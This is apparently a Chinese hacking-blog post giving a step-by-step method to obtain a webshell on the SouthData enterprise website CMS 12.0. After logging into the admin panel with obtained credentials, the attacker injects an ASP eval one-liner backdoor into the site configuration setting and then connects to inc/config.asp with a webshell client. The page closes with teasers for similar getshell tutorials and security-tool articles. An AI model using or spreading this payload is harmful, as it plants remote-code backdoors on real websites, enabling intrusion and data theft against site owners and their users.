南方数据企业网站管理系统12.0拿SHELL ***

hacker5年前黑客文章740

南方数据企业网站管理系统12.0插配置文件拿SHELL

在我们拿到南方数据企业管理系统后台账号密码后,可以使用下面的 *** 来拿shell

进入后台后 点击系统管理 网站配置

随便找个地方修改成

“%><%eval request(“qxz”)%><%Const nidaye=”xzlbb.com

然后用一句话客户端连接http://目标网站/inc/config.asp就OK了!

标签: 黑客技术

相关文章

木马备份数据成ASP脚本格式的文档

木马备份数据成ASP脚本格式的文档

因为我已经根据SQL引入获得了后台管理客户和登陆密码了,我也直接进入后台管理了。能够清晰的见到网站后台管理有“数据备份”作用。   数据备份 getshell 基本原理: 关键便是将一句...

Wireshark基础知识

Wireshark基础知识

Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...

Cain和Abel黑客工具是完全免费的吗?

Cain和Abel黑客工具是完全免费的吗?

什么叫Cain和Abel黑客工具? Cain和Abel是用以密码恢复的最火爆的专用工具之一。它能够 根据应用例如暴力行为进攻,登陆密码分析攻击和最常见的词典进攻这类的方式 来修复各种各样登陆密码。这...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Snort? Snort是由Martin Roesch建立的开源系统互联网入侵防御系统系统软件(NIDS)和互联网侵入防护系统(NIPS)。自2014年至今,Snort已由思科交换机全部。Sn...

OpenVAS是一个完全免费的漏洞检测程序流程

OpenVAS是一个完全免费的漏洞检测程序流程

什么叫OpenVAS? OpenVas是一个完全免费的漏洞检测程序流程,该专用工具在2006年的专用工具合理合法后才从最后一个漏洞检测程序流程(Nessus)的完全免费版本号中删掉。OpenVAS的...

动易CMS拿shell 图文教程

动易CMS拿shell 图文教程

 原创作者:泪舞   Qq:8109217   ( 转载请写上作者名 ) 动易CMS、我相信大家都不陌生吧?互联网很多企业站点都是用的动易...